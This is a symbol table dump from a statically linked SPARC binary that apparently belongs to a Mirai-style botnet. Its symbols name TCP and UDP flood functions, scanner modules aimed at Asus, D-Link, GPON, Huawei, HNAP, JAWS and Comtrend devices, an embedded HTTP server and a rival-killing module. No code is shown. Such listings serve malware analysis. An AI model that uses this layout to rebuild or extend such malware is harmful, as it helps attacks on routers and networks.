__nptl_deallocate_tsd	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__nptl_nthreads	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__open	.symtab	0x2a884	132	FUNC	<unknown>	DEFAULT	2
__open_nocancel	.symtab	0x2a890	32	FUNC	<unknown>	DEFAULT	2
__pagesize	.symtab	0x45114	4	OBJECT	<unknown>	DEFAULT	12
__preinit_array_end	.symtab	0x442e0	0	NOTYPE	<unknown>	HIDDEN	6
__preinit_array_start	.symtab	0x442e0	0	NOTYPE	<unknown>	HIDDEN	6
__progname	.symtab	0x44610	4	OBJECT	<unknown>	DEFAULT	11
__progname_full	.symtab	0x44614	4	OBJECT	<unknown>	DEFAULT	11
__pthread_initialize_minimal	.symtab	0x2f500	24	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_init	.symtab	0x2abf0	8	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_lock	.symtab	0x2abe8	8	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_trylock	.symtab	0x2abe8	8	FUNC	<unknown>	DEFAULT	2
__pthread_mutex_unlock	.symtab	0x2abe8	8	FUNC	<unknown>	DEFAULT	2
__pthread_return_0	.symtab	0x2abe8	8	FUNC	<unknown>	DEFAULT	2
__pthread_unwind	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__read	.symtab	0x2a98c	132	FUNC	<unknown>	DEFAULT	2
__read_nocancel	.symtab	0x2a998	32	FUNC	<unknown>	DEFAULT	2
__register_frame_info	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__rt_sigreturn_stub	.symtab	0x2b33c	16	FUNC	<unknown>	DEFAULT	2
__rtld_fini	.symtab	0x4511c	4	OBJECT	<unknown>	HIDDEN	12
__sigjmp_save	.symtab	0x2ee60	60	FUNC	<unknown>	HIDDEN	2
__sigreturn_stub	.symtab	0x2b34c	16	FUNC	<unknown>	DEFAULT	2
__sigsetjmp	.symtab	0x2b4e0	28	FUNC	<unknown>	DEFAULT	2
__socketcall	.symtab	0x2b504	92	FUNC	<unknown>	HIDDEN	2
__socketcall.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__sparc32_atomic_locks	.symtab	0x44b68	64	OBJECT	<unknown>	HIDDEN	12
__stdin	.symtab	0x44630	4	OBJECT	<unknown>	DEFAULT	11
__stdio_READ	.symtab	0x2fa8c	104	FUNC	<unknown>	HIDDEN	2
__stdio_WRITE	.symtab	0x2fafc	248	FUNC	<unknown>	HIDDEN	2
__stdio_adjust_position	.symtab	0x2fbfc	248	FUNC	<unknown>	HIDDEN	2
__stdio_fwrite	.symtab	0x2ca60	320	FUNC	<unknown>	HIDDEN	2
__stdio_rfill	.symtab	0x2fcf4	56	FUNC	<unknown>	HIDDEN	2
__stdio_seek	.symtab	0x2fde0	52	FUNC	<unknown>	HIDDEN	2
__stdio_trans2r_o	.symtab	0x2fd34	172	FUNC	<unknown>	HIDDEN	2
__stdio_trans2w_o	.symtab	0x2cd68	272	FUNC	<unknown>	HIDDEN	2
__stdio_wcommit	.symtab	0x2ce78	56	FUNC	<unknown>	HIDDEN	2
__stdout	.symtab	0x44634	4	OBJECT	<unknown>	DEFAULT	11
__syscall_error	.symtab	0x2b314	40	FUNC	<unknown>	HIDDEN	2
__syscall_error.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_fcntl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__syscall_nanosleep	.symtab	0x2b930	92	FUNC	<unknown>	DEFAULT	2
__syscall_select	.symtab	0x241b0	104	FUNC	<unknown>	DEFAULT	2
__uClibc_fini	.symtab	0x2ac30	168	FUNC	<unknown>	DEFAULT	2
__uClibc_init	.symtab	0x2ad2c	92	FUNC	<unknown>	DEFAULT	2
__uClibc_main	.symtab	0x2ad88	1056	FUNC	<unknown>	DEFAULT	2
__uClibc_main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__ubp_memchr	.symtab	0x2e438	280	FUNC	<unknown>	DEFAULT	2
__uclibc_progname	.symtab	0x4460c	4	OBJECT	<unknown>	HIDDEN	11
__vfork	.symtab	0x2f15c	76	FUNC	<unknown>	DEFAULT	2
__write	.symtab	0x2a908	132	FUNC	<unknown>	DEFAULT	2
__write_nocancel	.symtab	0x2a914	32	FUNC	<unknown>	DEFAULT	2
__xpg_strerror_r	.symtab	0x27838	300	FUNC	<unknown>	DEFAULT	2
__xpg_strerror_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
__xstat32_conv	.symtab	0x243f4	132	FUNC	<unknown>	HIDDEN	2
__xstat64_conv	.symtab	0x24368	140	FUNC	<unknown>	HIDDEN	2
_adjust_pos.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_bss_custom_printf_spec	.symtab	0x44ba8	10	OBJECT	<unknown>	DEFAULT	12
_charpad	.symtab	0x249f8	64	FUNC	<unknown>	DEFAULT	2
_cs_funcs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_custom_printf_arginfo	.symtab	0x47700	40	OBJECT	<unknown>	HIDDEN	12
_custom_printf_handler	.symtab	0x47728	40	OBJECT	<unknown>	HIDDEN	12
_custom_printf_spec	.symtab	0x44514	4	OBJECT	<unknown>	HIDDEN	11
_dl_aux_init	.symtab	0x2f520	64	FUNC	<unknown>	DEFAULT	2
_dl_nothread_init_static_tls	.symtab	0x2f560	84	FUNC	<unknown>	HIDDEN	2
_dl_phdr	.symtab	0x47af0	4	OBJECT	<unknown>	DEFAULT	12
_dl_phnum	.symtab	0x47af4	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_dtv_gaps	.symtab	0x47ae4	1	OBJECT	<unknown>	DEFAULT	12
_dl_tls_dtv_slotinfo_list	.symtab	0x47ae0	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_generation	.symtab	0x47ae8	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_max_dtv_idx	.symtab	0x47ad8	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_setup	.symtab	0x2f228	92	FUNC	<unknown>	DEFAULT	2
_dl_tls_static_align	.symtab	0x47ad4	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_static_nelem	.symtab	0x47aec	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_static_size	.symtab	0x47adc	4	OBJECT	<unknown>	DEFAULT	12
_dl_tls_static_used	.symtab	0x47ad0	4	OBJECT	<unknown>	DEFAULT	12
_edata	.symtab	0x44708	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_end	.symtab	0x47af8	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_exit	.symtab	0x24034	128	FUNC	<unknown>	DEFAULT	2
_exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fini	.symtab	0x2ffbc	0	FUNC	<unknown>	DEFAULT	3
_fixed_buffers	.symtab	0x45140	8192	OBJECT	<unknown>	DEFAULT	12
_fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fp_out_narrow	.symtab	0x24a38	116	FUNC	<unknown>	DEFAULT	2
_fpmaxtostr	.symtab	0x2d0bc	2032	FUNC	<unknown>	HIDDEN	2
_fpmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_fwrite.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_init	.symtab	0x100b4	0	FUNC	<unknown>	DEFAULT	1
_load_inttype	.symtab	0x2ceb0	144	FUNC	<unknown>	HIDDEN	2
_load_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_init	.symtab	0x2521c	156	FUNC	<unknown>	HIDDEN	2
_ppfs_init.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_parsespec	.symtab	0x2555c	1604	FUNC	<unknown>	HIDDEN	2
_ppfs_parsespec.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_prepargs	.symtab	0x252b8	60	FUNC	<unknown>	HIDDEN	2
_ppfs_prepargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_ppfs_setargs	.symtab	0x252f4	492	FUNC	<unknown>	HIDDEN	2
_ppfs_setargs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_promoted_size	.symtab	0x254e8	116	FUNC	<unknown>	DEFAULT	2
_pthread_cleanup_pop_restore	.symtab	0x2ac04	36	FUNC	<unknown>	DEFAULT	2
_pthread_cleanup_push_defer	.symtab	0x2abf8	12	FUNC	<unknown>	DEFAULT	2
_rfill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_setjmp	.symtab	0x2b4d4	8	FUNC	<unknown>	DEFAULT	2
_start	.symtab	0x101c4	56	FUNC	<unknown>	DEFAULT	2
_stdio.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_stdio_fopen	.symtab	0x2c5bc	1188	FUNC	<unknown>	HIDDEN	2
_stdio_init	.symtab	0x2cba8	124	FUNC	<unknown>	HIDDEN	2
_stdio_openlist	.symtab	0x44638	4	OBJECT	<unknown>	DEFAULT	11
_stdio_openlist_add_lock	.symtab	0x45120	12	OBJECT	<unknown>	DEFAULT	12
_stdio_openlist_dec_use	.symtab	0x2daf8	736	FUNC	<unknown>	HIDDEN	2
_stdio_openlist_del_count	.symtab	0x4513c	4	OBJECT	<unknown>	DEFAULT	12
_stdio_openlist_del_lock	.symtab	0x4512c	12	OBJECT	<unknown>	DEFAULT	12
_stdio_openlist_use_count	.symtab	0x45138	4	OBJECT	<unknown>	DEFAULT	12
_stdio_streams	.symtab	0x4463c	204	OBJECT	<unknown>	DEFAULT	11
_stdio_term	.symtab	0x2cc24	316	FUNC	<unknown>	HIDDEN	2
_stdio_user_locking	.symtab	0x44620	4	OBJECT	<unknown>	DEFAULT	11
_stdlib_strto_l	.symtab	0x2eed0	472	FUNC	<unknown>	HIDDEN	2
_stdlib_strto_l.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_store_inttype	.symtab	0x2cf40	60	FUNC	<unknown>	HIDDEN	2
_store_inttype.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_string_syserrmsgs	.symtab	0x332c8	2934	OBJECT	<unknown>	HIDDEN	4
_string_syserrmsgs.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_trans2w.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_uintmaxtostr	.symtab	0x2cf7c	312	FUNC	<unknown>	HIDDEN	2
_uintmaxtostr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_vfprintf_internal	.symtab	0x24ab4	1896	FUNC	<unknown>	HIDDEN	2
_vfprintf_internal.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
_wcommit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
abort	.symtab	0x290c0	280	FUNC	<unknown>	DEFAULT	2
abort.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
accept	.symtab	0x279f4	96	FUNC	<unknown>	DEFAULT	2
accept.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
arch_names	.symtab	0x31960	32	OBJECT	<unknown>	DEFAULT	4
asus.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
asus_fake_time	.symtab	0x44758	4	OBJECT	<unknown>	DEFAULT	12
asus_init	.symtab	0x102d0	2756	FUNC	<unknown>	DEFAULT	2
asus_rsck	.symtab	0x44728	4	OBJECT	<unknown>	DEFAULT	12
asus_scanner_pid	.symtab	0x44724	4	OBJECT	<unknown>	DEFAULT	12
asus_scanner_rawpkt	.symtab	0x44730	40	OBJECT	<unknown>	DEFAULT	12
asus_setup_connection	.symtab	0x101fc	212	FUNC	<unknown>	DEFAULT	2
atoi	.symtab	0x2ee9c	24	FUNC	<unknown>	DEFAULT	2
atol	.symtab	0x2ee9c	24	FUNC	<unknown>	DEFAULT	2
atol.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_get_opt_int	.symtab	0x11274	112	FUNC	<unknown>	DEFAULT	2
attack_get_opt_ip	.symtab	0x11204	112	FUNC	<unknown>	DEFAULT	2
attack_init	.symtab	0x112e4	940	FUNC	<unknown>	DEFAULT	2
attack_kill_all	.symtab	0x10e6c	392	FUNC	<unknown>	DEFAULT	2
attack_method_nudp	.symtab	0x14b2c	1408	FUNC	<unknown>	DEFAULT	2
attack_method_stdhex	.symtab	0x14864	712	FUNC	<unknown>	DEFAULT	2
attack_method_tcp	.symtab	0x11d10	1620	FUNC	<unknown>	DEFAULT	2
attack_ongoing	.symtab	0x44764	32	OBJECT	<unknown>	DEFAULT	12
attack_parse	.symtab	0x10ff4	528	FUNC	<unknown>	DEFAULT	2
attack_start	.symtab	0x10d94	216	FUNC	<unknown>	DEFAULT	2
attack_tcp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_tcp_ack	.symtab	0x130f0	1744	FUNC	<unknown>	DEFAULT	2
attack_tcp_null	.symtab	0x13e5c	1904	FUNC	<unknown>	DEFAULT	2
attack_tcp_sack2	.symtab	0x12364	1640	FUNC	<unknown>	DEFAULT	2
attack_tcp_stomp	.symtab	0x129cc	1828	FUNC	<unknown>	DEFAULT	2
attack_tcp_syn	.symtab	0x11690	1664	FUNC	<unknown>	DEFAULT	2
attack_tcp_syndata	.symtab	0x137c0	1692	FUNC	<unknown>	DEFAULT	2
attack_udp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_udp_plain	.symtab	0x145d4	656	FUNC	<unknown>	DEFAULT	2
bcopy	.symtab	0x25ce4	12	FUNC	<unknown>	DEFAULT	2
been_there_done_that	.symtab	0x44bbc	4	OBJECT	<unknown>	DEFAULT	12
bind	.symtab	0x27a54	36	FUNC	<unknown>	DEFAULT	2
bind.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
blink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
brk	.symtab	0x2f5bc	88	FUNC	<unknown>	DEFAULT	2
brk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
bzero	.symtab	0x27348	52	FUNC	<unknown>	DEFAULT	2
call___do_global_ctors_aux	.symtab	0x2ffb0	0	FUNC	<unknown>	DEFAULT	2
call___do_global_dtors_aux	.symtab	0x1014c	0	FUNC	<unknown>	DEFAULT	2
call_frame_dummy	.symtab	0x101b8	0	FUNC	<unknown>	DEFAULT	2
calloc	.symtab	0x28730	284	FUNC	<unknown>	DEFAULT	2
calloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum_generic	.symtab	0x15ca8	100	FUNC	<unknown>	DEFAULT	2
checksum_tcpudp	.symtab	0x15d0c	200	FUNC	<unknown>	DEFAULT	2
clock	.symtab	0x24888	56	FUNC	<unknown>	DEFAULT	2
clock.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
close	.symtab	0x2a808	124	FUNC	<unknown>	DEFAULT	2
closedir	.symtab	0x24480	208	FUNC	<unknown>	DEFAULT	2
closedir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
completed.4753	.symtab	0x44708	1	OBJECT	<unknown>	DEFAULT	12
comtrend.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
comtrend_fake_time	.symtab	0x447f0	4	OBJECT	<unknown>	DEFAULT	12
comtrend_init	.symtab	0x15ea8	3140	FUNC	<unknown>	DEFAULT	2
comtrend_init_pid	.symtab	0x447c0	4	OBJECT	<unknown>	DEFAULT	12
comtrend_init_rawpkt	.symtab	0x447c8	40	OBJECT	<unknown>	DEFAULT	12
comtrend_range	.symtab	0x4448c	36	OBJECT	<unknown>	DEFAULT	11
comtrend_rsck	.symtab	0x447c4	4	OBJECT	<unknown>	DEFAULT	12
comtrend_setup_connection	.symtab	0x15dd4	212	FUNC	<unknown>	DEFAULT	2
conn_table	.symtab	0x447bc	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x44a04	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x44abc	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x44af4	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x44b64	4	OBJECT	<unknown>	DEFAULT	12
conn_table	.symtab	0x47680	4	OBJECT	<unknown>	DEFAULT	12
connect	.symtab	0x27a78	96	FUNC	<unknown>	DEFAULT	2
connect.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dl-support.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
dlink_init	.symtab	0x16bc0	2840	FUNC	<unknown>	DEFAULT	2
dlinkscanner_fake_time	.symtab	0x44828	4	OBJECT	<unknown>	DEFAULT	12
dlinkscanner_rsck	.symtab	0x447f8	4	OBJECT	<unknown>	DEFAULT	12
dlinkscanner_scanner_pid	.symtab	0x447f4	4	OBJECT	<unknown>	DEFAULT	12
dlinkscanner_scanner_rawpkt	.symtab	0x44800	40	OBJECT	<unknown>	DEFAULT	12
dlinkscanner_setup_connection	.symtab	0x16aec	212	FUNC	<unknown>	DEFAULT	2
entries	.symtab	0x476b0	4	OBJECT	<unknown>	DEFAULT	12
environ	.symtab	0x45110	4	OBJECT	<unknown>	DEFAULT	12
errno	.symtab	0x0	4	TLS	<unknown>	DEFAULT	6
errno.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
estridx	.symtab	0x33238	126	OBJECT	<unknown>	DEFAULT	4
execl	.symtab	0x2f0b0	172	FUNC	<unknown>	DEFAULT	2
execl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
execve	.symtab	0x2f61c	96	FUNC	<unknown>	DEFAULT	2
execve.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exit	.symtab	0x29754	168	FUNC	<unknown>	DEFAULT	2
exit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
exp10_table	.symtab	0x34250	72	OBJECT	<unknown>	DEFAULT	4
fclose	.symtab	0x2c240	860	FUNC	<unknown>	DEFAULT	2
fclose.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fcntl	.symtab	0x23f34	248	FUNC	<unknown>	DEFAULT	2
fd_ctrl	.symtab	0x444e0	4	OBJECT	<unknown>	DEFAULT	11
fd_serv	.symtab	0x444e4	4	OBJECT	<unknown>	DEFAULT	11
fd_to_DIR	.symtab	0x24558	176	FUNC	<unknown>	DEFAULT	2
fdopendir	.symtab	0x246ec	176	FUNC	<unknown>	DEFAULT	2
fflush_unlocked	.symtab	0x2ddd8	992	FUNC	<unknown>	DEFAULT	2
fflush_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc	.symtab	0x2d8ac	320	FUNC	<unknown>	DEFAULT	2
fgetc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgetc_unlocked	.symtab	0x2e1c0	344	FUNC	<unknown>	DEFAULT	2
fgetc_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets	.symtab	0x2d9ec	260	FUNC	<unknown>	DEFAULT	2
fgets.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fgets_unlocked	.symtab	0x2e318	160	FUNC	<unknown>	DEFAULT	2
fgets_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
first_connect	.symtab	0x4497c	4	OBJECT	<unknown>	DEFAULT	12
fmt	.symtab	0x34238	20	OBJECT	<unknown>	DEFAULT	4
fopen	.symtab	0x2c59c	24	FUNC	<unknown>	DEFAULT	2
fopen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fork	.symtab	0x2a044	1088	FUNC	<unknown>	DEFAULT	2
fork.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fork_handler_pool	.symtab	0x44bc8	1348	OBJECT	<unknown>	DEFAULT	12
fputs_unlocked	.symtab	0x25ba0	60	FUNC	<unknown>	DEFAULT	2
fputs_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
frame_dummy	.symtab	0x10158	0	FUNC	<unknown>	DEFAULT	2
free	.symtab	0x28e54	564	FUNC	<unknown>	DEFAULT	2
free.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseek	.symtab	0x2f8a0	36	FUNC	<unknown>	DEFAULT	2
fseeko	.symtab	0x2f8a0	36	FUNC	<unknown>	DEFAULT	2
fseeko.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseeko64	.symtab	0x2f8cc	448	FUNC	<unknown>	DEFAULT	2
fseeko64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fstat	.symtab	0x2b568	116	FUNC	<unknown>	DEFAULT	2
fstat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fwrite_unlocked	.symtab	0x25be4	196	FUNC	<unknown>	DEFAULT	2
fwrite_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getc	.symtab	0x2d8ac	320	FUNC	<unknown>	DEFAULT	2
getc_unlocked	.symtab	0x2e1c0	344	FUNC	<unknown>	DEFAULT	2
getdents.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getdents64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getdtablesize	.symtab	0x2b694	40	FUNC	<unknown>	DEFAULT	2
getdtablesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getegid	.symtab	0x2b6bc	32	FUNC	<unknown>	DEFAULT	2
getegid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
geteuid	.symtab	0x2b6dc	32	FUNC	<unknown>	DEFAULT	2
geteuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getgid	.symtab	0x2b6fc	32	FUNC	<unknown>	DEFAULT	2
getgid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpagesize	.symtab	0x2b724	56	FUNC	<unknown>	DEFAULT	2
getpagesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpid	.symtab	0x2a548	88	FUNC	<unknown>	DEFAULT	2
getpid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getppid	.symtab	0x240b4	32	FUNC	<unknown>	DEFAULT	2
getppid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getrlimit	.symtab	0x2b764	92	FUNC	<unknown>	DEFAULT	2
getrlimit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockname	.symtab	0x27ad8	36	FUNC	<unknown>	DEFAULT	2
getsockname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockopt	.symtab	0x27afc	44	FUNC	<unknown>	DEFAULT	2
getsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getuid	.symtab	0x2b7c0	32	FUNC	<unknown>	DEFAULT	2
getuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gpon443.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gpon443_fake_time	.symtab	0x44860	4	OBJECT	<unknown>	DEFAULT	12
gpon443_init	.symtab	0x177ac	2888	FUNC	<unknown>	DEFAULT	2
gpon443_init_pid	.symtab	0x4482c	4	OBJECT	<unknown>	DEFAULT	12
gpon443_init_rawpkt	.symtab	0x44838	40	OBJECT	<unknown>	DEFAULT	12
gpon443_ranges	.symtab	0x444b0	44	OBJECT	<unknown>	DEFAULT	11
gpon443_rsck	.symtab	0x44830	4	OBJECT	<unknown>	DEFAULT	12
gpon443_setup_connection	.symtab	0x176d8	212	FUNC	<unknown>	DEFAULT	2
gpon80.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gpon80_fake_time	.symtab	0x44898	4	OBJECT	<unknown>	DEFAULT	12
gpon80_init	.symtab	0x183c8	2752	FUNC	<unknown>	DEFAULT	2
gpon80_init_pid	.symtab	0x44864	4	OBJECT	<unknown>	DEFAULT	12
gpon80_init_rawpkt	.symtab	0x44870	40	OBJECT	<unknown>	DEFAULT	12
gpon80_rsck	.symtab	0x44868	4	OBJECT	<unknown>	DEFAULT	12
gpon80_setup_connection	.symtab	0x182f4	212	FUNC	<unknown>	DEFAULT	2
h_errno	.symtab	0x4	4	TLS	<unknown>	DEFAULT	6
hexPayload	.symtab	0x44488	4	OBJECT	<unknown>	DEFAULT	11
hnap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
hnap_init	.symtab	0x18f5c	2688	FUNC	<unknown>	DEFAULT	2
hnapscanner_fake_time	.symtab	0x448d0	4	OBJECT	<unknown>	DEFAULT	12
hnapscanner_rsck	.symtab	0x448a0	4	OBJECT	<unknown>	DEFAULT	12
hnapscanner_scanner_pid	.symtab	0x4489c	4	OBJECT	<unknown>	DEFAULT	12
hnapscanner_scanner_rawpkt	.symtab	0x448a8	40	OBJECT	<unknown>	DEFAULT	12
hnapscanner_setup_connection	.symtab	0x18e88	212	FUNC	<unknown>	DEFAULT	2
httpd.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
httpd_pid	.symtab	0x444dc	4	OBJECT	<unknown>	DEFAULT	11
httpd_port	.symtab	0x44984	4	OBJECT	<unknown>	DEFAULT	12
httpd_serve	.symtab	0x19a48	568	FUNC	<unknown>	DEFAULT	2
httpd_start	.symtab	0x19c80	452	FUNC	<unknown>	DEFAULT	2
httpd_started	.symtab	0x44988	4	OBJECT	<unknown>	DEFAULT	12
huawei.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
huawei_fake_time	.symtab	0x44908	4	OBJECT	<unknown>	DEFAULT	12
huawei_init	.symtab	0x19f18	2844	FUNC	<unknown>	DEFAULT	2
huawei_rsck	.symtab	0x448d8	4	OBJECT	<unknown>	DEFAULT	12
huawei_scanner_pid	.symtab	0x448d4	4	OBJECT	<unknown>	DEFAULT	12
huawei_scanner_rawpkt	.symtab	0x448e0	40	OBJECT	<unknown>	DEFAULT	12
huawei_setup_connection	.symtab	0x19e44	212	FUNC	<unknown>	DEFAULT	2
id_buf	.symtab	0x47690	32	OBJECT	<unknown>	DEFAULT	12
index	.symtab	0x2e5c4	524	FUNC	<unknown>	DEFAULT	2
inet_addr	.symtab	0x279cc	40	FUNC	<unknown>	DEFAULT	2
inet_aton	.symtab	0x2ed6c	244	FUNC	<unknown>	DEFAULT	2
inet_aton.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_makeaddr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
init_static_tls	.symtab	0x2f1b0	120	FUNC	<unknown>	DEFAULT	2
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initstate	.symtab	0x292d8	124	FUNC	<unknown>	DEFAULT	2
initstate_r	.symtab	0x29544	244	FUNC	<unknown>	DEFAULT	2
ioctl	.symtab	0x2f684	228	FUNC	<unknown>	DEFAULT	2
ioctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
isatty	.symtab	0x2ecd8	32	FUNC	<unknown>	DEFAULT	2
isatty.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
jaws.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
jaws_fake_time	.symtab	0x44940	4	OBJECT	<unknown>	DEFAULT	12
jaws_init	.symtab	0x1ab08	2680	FUNC	<unknown>	DEFAULT	2
jaws_init_pid	.symtab	0x4490c	4	OBJECT	<unknown>	DEFAULT	12
jaws_init_rawpkt	.symtab	0x44918	40	OBJECT	<unknown>	DEFAULT	12
jaws_rsck	.symtab	0x44910	4	OBJECT	<unknown>	DEFAULT	12
jaws_setup_connection	.symtab	0x1aa34	212	FUNC	<unknown>	DEFAULT	2
kill	.symtab	0x240dc	92	FUNC	<unknown>	DEFAULT	2
kill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
killer.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
killer_init	.symtab	0x1b70c	248	FUNC	<unknown>	DEFAULT	2
killer_kill	.symtab	0x1b580	44	FUNC	<unknown>	DEFAULT	2
killer_mirai_exists	.symtab	0x1b5ac	352	FUNC	<unknown>	DEFAULT	2
